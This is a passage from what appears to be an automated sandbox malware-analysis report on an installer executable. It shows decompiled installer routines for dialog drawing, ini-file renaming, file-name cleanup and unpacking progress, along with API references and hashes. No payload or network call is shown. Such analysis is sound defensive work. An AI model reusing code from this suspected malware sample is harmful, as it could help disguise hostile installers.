							if( *((intOrPtr*)(_t110 + 0x10)) == 0xd) {
								SendMessageA( *0x423ea8, 0x111, 1, 0);
							}
							if( *((intOrPtr*)(_t110 + 0x10)) == 0x1b) {
								SendMessageA( *0x423ea8, 0x10, 0, 0);
							}
							return 1;
						}
					}
					if(_a12 >> 0x10 != 0 ||  *0x420478 != 0) {
						goto L25;
					} else {
						_t103 =  *0x41fc68; // 0x0
						_t25 = _t103 + 0x14; // 0x14
						_t112 = _t25;
						if(( *_t112 & 0x00000020) == 0) {
							goto L25;
						}
						 *_t112 =  *_t112 & 0xfffffffe | SendMessageA(GetDlgItem(_a4, 0x40a), 0xf0, 0, 0) & 0x00000001;
						E00403E59(SendMessageA(GetDlgItem(_a4, 0x40a), 0xf0, 0, 0) & 0x00000001);
						E0040420A();
						goto L11;
					}
				}
				_t98 = _a16;
				_t113 =  *(_t98 + 0x30);
				if(_t113 < 0) {
					_t107 =  *0x42367c; // 0x4e3b8b
					_t113 =  *(_t107 - 4 + _t113 * 4);
				}
				_t71 =  *0x423ed8; // 0x4e2694
				_push( *((intOrPtr*)(_t98 + 0x34)));
				_t114 = _t113 + _t71;
				_push(0x22);
				_a16 =  *_t114;
				_v12 = _v12 & 0x00000000;
				_t115 = _t114 + 1;
				_v16 = _t115;
				_v8 = E00403F4B;
				E00403E37(_a4);
				_push( *((intOrPtr*)(_t98 + 0x38)));
				_push(0x23);
				E00403E37(_a4);
				CheckDlgButton(_a4, (0 | ( !( *(_t98 + 0x14)) >> 0x00000005 & 0x00000001 |  *(_t98 + 0x14) & 0x00000001) == 0x00000000) + 0x40a, 1);
				E00403E59( !( *(_t98 + 0x14)) >> 0x00000005 & 0x00000001 |  *(_t98 + 0x14) & 0x00000001);
				_t99 = GetDlgItem(_a4, 0x3e8);
				E00403E6C(_t99);
				SendMessageA(_t99, 0x45b, 1, 0);
				_t85 =  *0x423eb0; // 0x4de368
				_t86 =  *(_t85 + 0x68);
				if(_t86 < 0) {
					_t86 = GetSysColor( ~_t86);
				}
				SendMessageA(_t99, 0x443, 0, _t86);
				SendMessageA(_t99, 0x445, 0, 0x4010000);
				 *0x41f45c =  *0x41f45c & 0x00000000;
				SendMessageA(_t99, 0x435, 0, lstrlenA(_t115));
				SendMessageA(_t99, 0x449, _a16,  &_v16);
				 *0x420478 =  *0x420478 & 0x00000000;
				return 0;
			}





















                      0x00403f8f
                      0x004040b5
                      0x00404111
                      0x00404115
                      0x004041ec
                      0x004041ee
                      0x004041ee
                      0x004041f4
                      0x004041f4
                      0x004041f7
                      0x00000000
                      0x004041fe
                      0x00404123
                      0x00404125
                      0x0040412f
                      0x0040413a
                      0x0040413d
                      0x00404140
                      0x0040414b
                      0x0040414e
                      0x00404155
                      0x00404163
                      0x0040417b
                      0x00404183
                      0x0040418e
                      0x0040419e
                      0x004041a0
                      0x004041a0
                      0x00404155
                      0x004041aa
                      0x00000000
                      0x004041b5
                      0x004041b9
                      0x004041ca
                      0x004041ca
                      0x004041d0
                      0x004041de
                      0x004041de
                      0x00000000
                      0x004041e2
                      0x004041aa
                      0x004040c0
                      0x00000000
                      0x004040d4
                      0x004040d4
                      0x004040da
                      0x004040da
                      0x004040e0
                      0x00000000
                      0x00000000
                      0x00404105
                      0x00404107
                      0x0040410c
                      0x00000000
                      0x0040410c
                      0x004040c0
                      0x00403f95
                      0x00403f98
                      0x00403f9d
                      0x00403f9f
                      0x00403fae
                      0x00403fae
                      0x00403fb0
                      0x00403fb5
                      0x00403fb8
                      0x00403fba
                      0x00403fbf
                      0x00403fc8
                      0x00403fce
                      0x00403fda
                      0x00403fdd
                      0x00403fe6
                      0x00403feb
                      0x00403fee
                      0x00403ff3
                      0x0040400a
                      0x00404011
                      0x00404024
                      0x00404027
                      0x0040403c
                      0x0040403e
                      0x00404043
                      0x00404048
                      0x0040404d
                      0x0040404d
                      0x0040405c
                      0x0040406b
                      0x0040406d
                      0x00404083
                      0x00404092
                      0x00404094
                      0x00000000

                      APIs
                      • CheckDlgButton.USER32 ref: 0040400A
                      • GetDlgItem.USER32 ref: 0040401E
                      • SendMessageA.USER32(00000000,0000045B,00000001,00000000), ref: 0040403C
                      • GetSysColor.USER32(?), ref: 0040404D
                      • SendMessageA.USER32(00000000,00000443,00000000,?), ref: 0040405C
                      • SendMessageA.USER32(00000000,00000445,00000000,04010000), ref: 0040406B
                      • lstrlenA.KERNEL32(?), ref: 00404075
                      • SendMessageA.USER32(00000000,00000435,00000000,00000000), ref: 00404083
                      • SendMessageA.USER32(00000000,00000449,?,00000110), ref: 00404092
                      • GetDlgItem.USER32 ref: 004040F5
                      • SendMessageA.USER32(00000000), ref: 004040F8
                      • GetDlgItem.USER32 ref: 00404123
                      • SendMessageA.USER32(00000000,0000044B,00000000,00000201), ref: 00404163
                      • LoadCursorA.USER32 ref: 00404172
                      • SetCursor.USER32(00000000), ref: 0040417B
                      • ShellExecuteA.SHELL32(0000070B,open,@.B,00000000,00000000,00000001), ref: 0040418E
                      • LoadCursorA.USER32 ref: 0040419B
                      • SetCursor.USER32(00000000), ref: 0040419E
                      • SendMessageA.USER32(00000111,00000001,00000000), ref: 004041CA
                      • SendMessageA.USER32(00000010,00000000,00000000), ref: 004041DE
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.295109291.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.295105752.0000000000400000.00000002.00020000.sdmp Download File
                      • Associated: 00000000.00000002.295121992.0000000000407000.00000002.00020000.sdmp Download File
                      • Associated: 00000000.00000002.295133925.0000000000409000.00000004.00020000.sdmp Download File
                      • Associated: 00000000.00000002.295153716.0000000000422000.00000004.00020000.sdmp Download File
                      • Associated: 00000000.00000002.295236745.0000000000429000.00000004.00020000.sdmp Download File
                      • Associated: 00000000.00000002.295242311.000000000042C000.00000002.00020000.sdmp Download File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_nji3Lg1ot6.jbxd
                      Similarity
                      • API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorExecuteShelllstrlen
                      • String ID: @.B$N$hM$open
                      • API String ID: 3615053054-4027334107
                      • Opcode ID: 086c9584272f405e5d23a234cb3672cb38a546f38c26fc4f0f37582571ec5c76
                      • Instruction ID: c3de460066171d4a99b3db8707b5a70307f179c1ca483427b8a670d92431fbf8
                      • Opcode Fuzzy Hash: 086c9584272f405e5d23a234cb3672cb38a546f38c26fc4f0f37582571ec5c76
                      • Instruction Fuzzy Hash: 4E61C3B1A40209BFEB109F60CC45B6A7B69FB54715F108136FB04BA2D1C7B8A951CFA8
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 00401000, Relevance: 29.9, APIs: 14, Strings: 3, Instructions: 125COMMON
                      Download Yara Rule
                      C-Code - Quality: 90%
                      			E00401000(struct HWND__* _a4, void* _a8, signed int _a12, void* _a16) {
				struct tagLOGBRUSH _v16;
				struct tagRECT _v32;
				struct tagPAINTSTRUCT _v96;
				struct HDC__* _t70;
				struct HBRUSH__* _t87;
				struct HFONT__* _t94;
				long _t102;
				intOrPtr _t115;
				signed int _t126;
				struct HDC__* _t128;
				intOrPtr _t130;

				if(_a8 == 0xf) {
					_t130 =  *0x423eb0; // 0x4de368
					_t70 = BeginPaint(_a4,  &_v96);
					_v16.lbStyle = _v16.lbStyle & 0x00000000;
					_a8 = _t70;
					GetClientRect(_a4,  &_v32);
					_t126 = _v32.bottom;
					_v32.bottom = _v32.bottom & 0x00000000;
					while(_v32.top < _t126) {
						_a12 = _t126 - _v32.top;
						asm("cdq");
						asm("cdq");
						asm("cdq");
						_v16.lbColor = 0 << 0x00000008 | (( *(_t130 + 0x50) & 0x000000ff) * _a12 + ( *(_t130 + 0x54) & 0x000000ff) * _v32.top) / _t126 & 0x000000ff;
						_t87 = CreateBrushIndirect( &_v16);
						_v32.bottom = _v32.bottom + 4;
						_a16 = _t87;
						FillRect(_a8,  &_v32, _t87);
						DeleteObject(_a16);
						_v32.top = _v32.top + 4;
					}
					if( *(_t130 + 0x58) != 0xffffffff) {
						_t94 = CreateFontIndirectA( *(_t130 + 0x34));
						_a16 = _t94;
						if(_t94 != 0) {
							_t128 = _a8;
							_v32.left = 0x10;
							_v32.top = 8;
							SetBkMode(_t128, 1);
							SetTextColor(_t128,  *(_t130 + 0x58));
							_a8 = SelectObject(_t128, _a16);
							DrawTextA(_t128, "jefgbrzfgglybaslbprz Setup", 0xffffffff,  &_v32, 0x820);
							SelectObject(_t128, _a8);
							DeleteObject(_a16);
						}
					}
					EndPaint(_a4,  &_v96);
					return 0;
				}
				_t102 = _a16;
				if(_a8 == 0x46) {
					 *(_t102 + 0x18) =  *(_t102 + 0x18) | 0x00000010;
					_t115 =  *0x423ea8; // 0x0
					 *((intOrPtr*)(_t102 + 4)) = _t115;
				}
				return DefWindowProcA(_a4, _a8, _a12, _t102);
			}














                      0x0040100a
                      0x00401039
                      0x00401047
                      0x0040104d
                      0x00401051
                      0x0040105b
                      0x00401061
                      0x00401064
                      0x004010f3
                      0x00401089
                      0x0040108c
                      0x004010a6
                      0x004010bd
                      0x004010cc
                      0x004010cf
                      0x004010d5
                      0x004010d9
                      0x004010e4
                      0x004010ed
                      0x004010ef
                      0x004010ef
                      0x00401100
                      0x00401105
                      0x0040110d
                      0x00401110
                      0x00401112
                      0x00401118
                      0x0040111f
                      0x00401126
                      0x00401130
                      0x00401142
                      0x00401156
                      0x00401160
                      0x00401165
                      0x00401165
                      0x00401110
                      0x0040116e
                      0x00000000
                      0x00401178
                      0x00401010
                      0x00401013
                      0x00401015
                      0x00401019
                      0x0040101f
                      0x0040101f
                      0x00000000

                      APIs
                      • DefWindowProcA.USER32(?,00000046,?,?), ref: 0040102C
                      • BeginPaint.USER32(?,?), ref: 00401047
                      • GetClientRect.USER32 ref: 0040105B
                      • CreateBrushIndirect.GDI32(00000000), ref: 004010CF
                      • FillRect.USER32 ref: 004010E4
                      • DeleteObject.GDI32(?), ref: 004010ED
                      • CreateFontIndirectA.GDI32(?), ref: 00401105
                      • SetBkMode.GDI32(00000000,00000001), ref: 00401126
                      • SetTextColor.GDI32(00000000,?), ref: 00401130
                      • SelectObject.GDI32(00000000,?), ref: 00401140
                      • DrawTextA.USER32(00000000,jefgbrzfgglybaslbprz Setup,000000FF,00000010,00000820), ref: 00401156
                      • SelectObject.GDI32(00000000,00000000), ref: 00401160
                      • DeleteObject.GDI32(?), ref: 00401165
                      • EndPaint.USER32(?,?), ref: 0040116E
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.295109291.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.295105752.0000000000400000.00000002.00020000.sdmp Download File
                      • Associated: 00000000.00000002.295121992.0000000000407000.00000002.00020000.sdmp Download File
                      • Associated: 00000000.00000002.295133925.0000000000409000.00000004.00020000.sdmp Download File
                      • Associated: 00000000.00000002.295153716.0000000000422000.00000004.00020000.sdmp Download File
                      • Associated: 00000000.00000002.295236745.0000000000429000.00000004.00020000.sdmp Download File
                      • Associated: 00000000.00000002.295242311.000000000042C000.00000002.00020000.sdmp Download File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_nji3Lg1ot6.jbxd
                      Similarity
                      • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                      • String ID: F$hM$jefgbrzfgglybaslbprz Setup
                      • API String ID: 941294808-3372912446
                      • Opcode ID: 1fa3053a276be56ef7da5d68adfba1d9971bfb9fa2beb597bf2db4fb963a824d
                      • Instruction ID: 81477e3a2fde3fb3f26aa953fc06e347994717d76cab2c79682594c458f31f57
                      • Opcode Fuzzy Hash: 1fa3053a276be56ef7da5d68adfba1d9971bfb9fa2beb597bf2db4fb963a824d
                      • Instruction Fuzzy Hash: 8141BC71804249AFCB058FA4CD459BFBFB9FF44314F00802AF551AA1A0C378EA54DFA5
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 004057D3, Relevance: 26.4, APIs: 11, Strings: 4, Instructions: 144filememoryCOMMON
                      Download Yara Rule
                      C-Code - Quality: 93%
                      			E004057D3() {
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr* _t15;
				long _t16;
				intOrPtr _t18;
				int _t20;
				void* _t28;
				long _t29;
				intOrPtr* _t37;
				int _t43;
				void* _t44;
				long _t47;
				CHAR* _t49;
				void* _t51;
				void* _t53;
				intOrPtr* _t54;
				void* _t55;
				void* _t56;

				_t15 = E00405DA3(1);
				_t49 =  *(_t55 + 0x18);
				if(_t15 != 0) {
					_t20 =  *_t15( *(_t55 + 0x1c), _t49, 5);
					if(_t20 != 0) {
						L16:
						 *0x423f30 =  *0x423f30 + 1;
						return _t20;
					}
				}
				 *0x422628 = 0x4c554e;
				if(_t49 == 0) {
					L5:
					_t16 = GetShortPathNameA( *(_t55 + 0x1c), 0x4220a0, 0x400);
					if(_t16 != 0 && _t16 <= 0x400) {
						_t43 = wsprintfA(0x421ca0, "%s=%s\r\n", 0x422628, 0x4220a0);
						_t18 =  *0x423eb0; // 0x4de368
						_t56 = _t55 + 0x10;
						E00405AA7(_t43, 0x400, 0x4220a0, 0x4220a0,  *((intOrPtr*)(_t18 + 0x128)));
						_t20 = E0040575C(0x4220a0, 0xc0000000, 4);
						_t53 = _t20;
						 *(_t56 + 0x14) = _t53;
						if(_t53 == 0xffffffff) {
							goto L16;
						}
						_t47 = GetFileSize(_t53, 0);
						_t7 = _t43 + 0xa; // 0xa
						_t51 = GlobalAlloc(0x40, _t47 + _t7);
						if(_t51 == 0 || ReadFile(_t53, _t51, _t47, _t56 + 0x18, 0) == 0 || _t47 !=  *(_t56 + 0x18)) {
							L15:
							_t20 = CloseHandle(_t53);
							goto L16;
						} else {
							if(E004056D1(_t51, "[Rename]\r\n") != 0) {
								_t28 = E004056D1(_t26 + 0xa, 0x409348);
								if(_t28 == 0) {
									L13:
									_t29 = _t47;
									L14:
									E0040571D(_t51 + _t29, 0x421ca0, _t43);
									SetFilePointer(_t53, 0, 0, 0);
									WriteFile(_t53, _t51, _t47 + _t43, _t56 + 0x18, 0);
									GlobalFree(_t51);
									goto L15;
								}
								_t37 = _t28 + 1;
								_t44 = _t51 + _t47;
								_t54 = _t37;
								if(_t37 >= _t44) {
									L21:
									_t53 =  *(_t56 + 0x14);
									_t29 = _t37 - _t51;
									goto L14;
								} else {
									goto L20;
								}
								do {
									L20:
									 *((char*)(_t43 + _t54)) =  *_t54;
									_t54 = _t54 + 1;
								} while (_t54 < _t44);
								goto L21;
							}
							E00405A85(_t51 + _t47, "[Rename]\r\n");
							_t47 = _t47 + 0xa;
							goto L13;
						}
					}
				} else {
					CloseHandle(E0040575C(_t49, 0, 1));
					_t16 = GetShortPathNameA(_t49, 0x422628, 0x400);
					if(_t16 != 0 && _t16 <= 0x400) {
						goto L5;
					}
				}
				return _t16;
			}






















                      0x004057d9
                      0x004057e0
                      0x004057e4
                      0x004057ed
                      0x004057f1
                      0x00405930
                      0x00405930
                      0x00000000
                      0x00405930
                      0x004057f1
                      0x004057fd
                      0x00405813
                      0x0040583b
                      0x00405846
                      0x0040584a
                      0x0040586a
                      0x0040586c
                      0x00405871
                      0x0040587b
                      0x00405888
                      0x0040588d
                      0x00405892
                      0x00405896
                      0x00000000
                      0x00000000
                      0x004058a5
                      0x004058a7
                      0x004058b4
                      0x004058b8
                      0x00405929
                      0x0040592a
                      0x00000000
                      0x004058d4
                      0x004058e1
                      0x00405946
                      0x0040594d
                      0x004058f4
                      0x004058f4
                      0x004058f6
                      0x004058ff
                      0x0040590a
                      0x0040591c
                      0x00405923
                      0x00000000
                      0x00405923
                      0x0040594f
                      0x00405950
                      0x00405955
                      0x00405957
                      0x00405964
                      0x00405964
                      0x00405968
                      0x00000000
                      0x00000000
                      0x00000000
                      0x00000000
                      0x00405959
                      0x00405959
                      0x0040595c
                      0x0040595f
                      0x00405960
                      0x00000000
                      0x00405959
                      0x004058ec
                      0x004058f1
                      0x00000000
                      0x004058f1
                      0x004058b8
                      0x00405815
                      0x00405820
                      0x00405829
                      0x0040582d
                      0x00000000
                      0x00000000
                      0x0040582d
                      0x0040593a

                      APIs
                        • Part of subcall function 00405DA3: GetModuleHandleA.KERNEL32(?,?,00000000,00403268,00000008), ref: 00405DB5
                        • Part of subcall function 00405DA3: LoadLibraryA.KERNELBASE(?,?,00000000,00403268,00000008), ref: 00405DC0
                        • Part of subcall function 00405DA3: GetProcAddress.KERNEL32(00000000,?), ref: 00405DD1
                      • CloseHandle.KERNEL32(00000000,?,00000000,00000001,00000001,?,00000000,?,?,00405568,?,00000000,000000F1,?), ref: 00405820
                      • GetShortPathNameA.KERNEL32 ref: 00405829
                      • GetShortPathNameA.KERNEL32 ref: 00405846
                      • wsprintfA.USER32 ref: 00405864
                      • GetFileSize.KERNEL32(00000000,00000000,004220A0,C0000000,00000004,004220A0,?,?,?,00000000,000000F1,?), ref: 0040589F
                      • GlobalAlloc.KERNEL32(00000040,0000000A,?,?,00000000,000000F1,?), ref: 004058AE
                      • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,?,?,00000000,000000F1,?), ref: 004058C4
                      • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000,?,00421CA0,00000000,-0000000A,00409348,00000000,[Rename],?,?,00000000,000000F1,?), ref: 0040590A
                      • WriteFile.KERNEL32(00000000,00000000,?,?,00000000,?,?,00000000,000000F1,?), ref: 0040591C
                      • GlobalFree.KERNEL32 ref: 00405923
                      • CloseHandle.KERNEL32(00000000,?,?,00000000,000000F1,?), ref: 0040592A
                        • Part of subcall function 004056D1: lstrlenA.KERNEL32(00000000,?,00000000,00000000,004058DF,00000000,[Rename],?,?,00000000,000000F1,?), ref: 004056D8
                        • Part of subcall function 004056D1: lstrlenA.KERNEL32(00000000,00000000,?,00000000,00000000,004058DF,00000000,[Rename],?,?,00000000,000000F1,?), ref: 00405708
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.295109291.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.295105752.0000000000400000.00000002.00020000.sdmp Download File
                      • Associated: 00000000.00000002.295121992.0000000000407000.00000002.00020000.sdmp Download File
                      • Associated: 00000000.00000002.295133925.0000000000409000.00000004.00020000.sdmp Download File
                      • Associated: 00000000.00000002.295153716.0000000000422000.00000004.00020000.sdmp Download File
                      • Associated: 00000000.00000002.295236745.0000000000429000.00000004.00020000.sdmp Download File
                      • Associated: 00000000.00000002.295242311.000000000042C000.00000002.00020000.sdmp Download File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_nji3Lg1ot6.jbxd
                      Similarity
                      • API ID: File$Handle$CloseGlobalNamePathShortlstrlen$AddressAllocFreeLibraryLoadModulePointerProcReadSizeWritewsprintf
                      • String ID: %s=%s$(&B$[Rename]$hM
                      • API String ID: 3772915668-2130575897
                      • Opcode ID: 59f55a9dc5d97f07b1302869ed359d77eb01a2f99cc6c2b796ec22a8fd90dab3
                      • Instruction ID: f113039d6a8e0b98787bbcb52898fefdd985450d1919188b96c4478b1d7dfea3
                      • Opcode Fuzzy Hash: 59f55a9dc5d97f07b1302869ed359d77eb01a2f99cc6c2b796ec22a8fd90dab3
                      • Instruction Fuzzy Hash: 0F412371A00B11FBD3216B619D48FAB3A5CDB45764F100036FA05F22D2E678A801CEBD
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 00405CE3, Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 69COMMON
                      Download Yara Rule
                      C-Code - Quality: 100%
                      			E00405CE3(CHAR* _a4) {
				char _t5;
				char _t7;
				char* _t15;
				char* _t16;
				CHAR* _t17;

				_t17 = _a4;
				if( *_t17 == 0x5c && _t17[1] == 0x5c && _t17[2] == 0x3f && _t17[3] == 0x5c) {
					_t17 =  &(_t17[4]);
				}
				if( *_t17 != 0 && E004055E5(_t17) != 0) {
					_t17 =  &(_t17[2]);
				}
				_t5 =  *_t17;
				_t15 = _t17;
				_t16 = _t17;
				if(_t5 != 0) {
					do {
						if(_t5 > 0x1f &&  *((char*)(E004055A3("*?|<>/\":", _t5))) == 0) {
							E0040571D(_t16, _t17, CharNextA(_t17) - _t17);
							_t16 = CharNextA(_t16);
						}
						_t17 = CharNextA(_t17);
						_t5 =  *_t17;
					} while (_t5 != 0);
				}
				 *_t16 =  *_t16 & 0x00000000;
				while(1) {
					_t16 = CharPrevA(_t15, _t16);
					_t7 =  *_t16;
					if(_t7 != 0x20 && _t7 != 0x5c) {
						break;
					}
					 *_t16 =  *_t16 & 0x00000000;
					if(_t15 < _t16) {
						continue;
					}
					break;
				}
				return _t7;
			}








                      0x00405ce5
                      0x00405ced
                      0x00405d01
                      0x00405d01
                      0x00405d07
                      0x00405d14
                      0x00405d14
                      0x00405d15
                      0x00405d17
                      0x00405d1b
                      0x00405d1d
                      0x00405d26
                      0x00405d28
                      0x00405d42
                      0x00405d4a
                      0x00405d4a
                      0x00405d4f
                      0x00405d51
                      0x00405d53
                      0x00405d57
                      0x00405d58
                      0x00405d5b
                      0x00405d63
                      0x00405d65
                      0x00405d69
                      0x00000000
                      0x00000000
                      0x00405d6f
                      0x00405d74
                      0x00000000
                      0x00000000
                      0x00000000
                      0x00405d74
                      0x00405d79

                      APIs
                      • CharNextA.USER32(?,*?|<>/":,00000000,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\nji3Lg1ot6.exe" ,C:\Users\user\AppData\Local\Temp\,00000000,004031FD,C:\Users\user\AppData\Local\Temp\,00000000,0040336F), ref: 00405D3B
                      • CharNextA.USER32(?,?,?,00000000), ref: 00405D48
                      • CharNextA.USER32(?,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\nji3Lg1ot6.exe" ,C:\Users\user\AppData\Local\Temp\,00000000,004031FD,C:\Users\user\AppData\Local\Temp\,00000000,0040336F), ref: 00405D4D
                      • CharPrevA.USER32(?,?,"C:\Users\user\Desktop\nji3Lg1ot6.exe" ,C:\Users\user\AppData\Local\Temp\,00000000,004031FD,C:\Users\user\AppData\Local\Temp\,00000000,0040336F), ref: 00405D5D
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.295109291.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.295105752.0000000000400000.00000002.00020000.sdmp Download File
                      • Associated: 00000000.00000002.295121992.0000000000407000.00000002.00020000.sdmp Download File
                      • Associated: 00000000.00000002.295133925.0000000000409000.00000004.00020000.sdmp Download File
                      • Associated: 00000000.00000002.295153716.0000000000422000.00000004.00020000.sdmp Download File
                      • Associated: 00000000.00000002.295236745.0000000000429000.00000004.00020000.sdmp Download File
                      • Associated: 00000000.00000002.295242311.000000000042C000.00000002.00020000.sdmp Download File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_nji3Lg1ot6.jbxd
                      Similarity
                      • API ID: Char$Next$Prev
                      • String ID: "C:\Users\user\Desktop\nji3Lg1ot6.exe" $*?|<>/":$C:\Users\user\AppData\Local\Temp\
                      • API String ID: 589700163-328088845
                      • Opcode ID: 7ea15337aa65b78854fdfbf4a976c6e6ace2ef0f47433067a0fc10695a03ac80
                      • Instruction ID: 2efc38d3d3d4567a91e012bcb7a73cc210910fb997772161a70c169f721ad970
                      • Opcode Fuzzy Hash: 7ea15337aa65b78854fdfbf4a976c6e6ace2ef0f47433067a0fc10695a03ac80
                      • Instruction Fuzzy Hash: 5811E251804B9129EB3226285C48B7B6F89CF97760F18807BE5C1722C2D67C5C429E6D
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 00402B2D, Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 36timeCOMMON
                      Download Yara Rule
                      C-Code - Quality: 100%
                      			E00402B2D(struct HWND__* _a4, intOrPtr _a8) {
				char _v68;
				void* _t11;
				CHAR* _t19;

				if(_a8 == 0x110) {
					SetTimer(_a4, 1, 0xfa, 0);
					_a8 = 0x113;
				}
				if(_a8 == 0x113) {
					_t11 = E00402BA9();
					_t19 = "unpacking data: %d%%";
					if( *0x423eb0 == 0) {
						_t19 = "verifying installer: %d%%";
					}
					wsprintfA( &_v68, _t19, _t11);
					SetWindowTextA(_a4,  &_v68);
					SetDlgItemTextA(_a4, 0x406,  &_v68);
				}
				return 0;
			}






                      0x00402b3a
                      0x00402b48
                      0x00402b4e
                      0x00402b4e
                      0x00402b5c
                      0x00402b5e
                      0x00402b6a
                      0x00402b6f
                      0x00402b71
                      0x00402b71
                      0x00402b7c
                      0x00402b8c
                      0x00402b9e
                      0x00402b9e
                      0x00402ba6

                      APIs
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.295109291.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.295105752.0000000000400000.00000002.00020000.sdmp Download File
                      • Associated: 00000000.00000002.295121992.0000000000407000.00000002.00020000.sdmp Download File
                      • Associated: 00000000.00000002.295133925.0000000000409000.00000004.00020000.sdmp Download File
                      • Associated: 00000000.00000002.295153716.0000000000422000.00000004.00020000.sdmp Download File
                      • Associated: 00000000.00000002.295236745.0000000000429000.00000004.00020000.sdmp Download File
                      • Associated: 00000000.00000002.295242311.000000000042C000.00000002.00020000.sdmp Download File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_nji3Lg1ot6.jbxd
                      Similarity
                      • API ID: Text$ItemTimerWindowwsprintf
                      • String ID: hM$unpacking data: %d%%$verifying installer: %d%%
                      • API String ID: 1451636040-392548334
                      • Opcode ID: e04cdd19e0c63b62eaa7e8eced31868a1262f8adf0a2f46f7645d1242f1aea5d
                      • Instruction ID: 63589245c82b20a35a818b51aea08eb627593e3ecb5db54badb7bc3d6c1792f2
                      • Opcode Fuzzy Hash: e04cdd19e0c63b62eaa7e8eced31868a1262f8adf0a2f46f7645d1242f1aea5d
                      • Instruction Fuzzy Hash: F3F01D70900209ABEF215F50DD0ABAA3779BB04345F00803AFA06A91D1D7B9AA569B99
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 00403E9E, Relevance: 12.1, APIs: 8, Instructions: 61COMMON
                      Download Yara Rule
                      C-Code - Quality: 100%
                      			E00403E9E(intOrPtr _a4, struct HDC__* _a8, struct HWND__* _a12) {
				struct tagLOGBRUSH _v16;
				long _t35;
				long _t37;
				void* _t40;
				long* _t49;

				if(_a4 + 0xfffffecd > 5) {
					L15:
					return 0;
				}
				_t49 = GetWindowLongA(_a12, 0xffffffeb);
				if(_t49 == 0) {
					goto L15;
				}
				_t35 =  *_t49;
				if((_t49[5] & 0x00000002) != 0) {
					_t35 = GetSysColor(_t35);
				}
				if((_t49[5] & 0x00000001) != 0) {
					SetTextColor(_a8, _t35);
				}
				SetBkMode(_a8, _t49[4]);
				_t37 = _t49[1];
				_v16.lbColor = _t37;
				if((_t49[5] & 0x00000008) != 0) {
					_t37 = GetSysColor(_t37);
					_v16.lbColor = _t37;
				}
				if((_t49[5] & 0x00000004) != 0) {
					SetBkColor(_a8, _t37);
				}
				if((_t49[5] & 0x00000010) != 0) {
					_v16.lbStyle = _t49[2];
					_t40 = _t49[3];
					if(_t40 != 0) {
						DeleteObject(_t40);
					}
					_t49[3] = CreateBrushIndirect( &_v16);
				}
				return _t49[3];
			}








                      0x00403eb0
                      0x00403f44
                      0x00000000
                      0x00403f44
                      0x00403ec1
                      0x00403ec5
                      0x00000000
                      0x00000000
                      0x00403ecb
                      0x00403ed4
                      0x00403ed7
                      0x00403ed7
                      0x00403edd
                      0x00403ee3
                      0x00403ee3
                      0x00403eef
                      0x00403ef5
                      0x00403efc
                      0x00403eff
                      0x00403f02
                      0x00403f04
                      0x00403f04
                      0x00403f0c
                      0x00403f12
                      0x00403f12
                      0x00403f1c
                      0x00403f21
                      0x00403f24
                      0x00403f29
                      0x00403f2c
                      0x00403f2c
                      0x00403f3c
                      0x00403f3c
                      0x00000000

                      APIs
                      Memory Dump Source
                      • Source File: 00000000.00000002.295109291.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.295105752.0000000000400000.00000002.00020000.sdmp Download File
                      • Associated: 00000000.00000002.295121992.0000000000407000.00000002.00020000.sdmp Download File
                      • Associated: 00000000.00000002.295133925.0000000000409000.00000004.00020000.sdmp Download File
                      • Associated: 00000000.00000002.295153716.0000000000422000.00000004.00020000.sdmp Download File
                      • Associated: 00000000.00000002.295236745.0000000000429000.00000004.00020000.sdmp Download File
                      • Associated: 00000000.00000002.295242311.000000000042C000.00000002.00020000.sdmp Download File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_nji3Lg1ot6.jbxd
                      Similarity
                      • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                      • String ID:
                      • API String ID: 2320649405-0
                      • Opcode ID: 54c4c26d0880f537c7164b4e2121e342b47f232b14c6c2566c024284623f766e
                      • Instruction ID: 00f1469000c5a89127aeec98ef40b5380c975c6b17ce5fce2ee989e1a8c22914
                      • Opcode Fuzzy Hash: 54c4c26d0880f537c7164b4e2121e342b47f232b14c6c2566c024284623f766e
                      • Instruction Fuzzy Hash: D9216271904745ABCB219F68DD08B5BBFF8AF01715B048A69F895E22E1C738E9048B55
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 0040266E, Relevance: 10.6, APIs: 7, Instructions: 89memoryfileCOMMON
                      Download Yara Rule
                      C-Code - Quality: 93%
                      			E0040266E(struct _OVERLAPPED* __ebx) {
				void* _t27;
				long _t32;
				struct _OVERLAPPED* _t47;
				void* _t51;
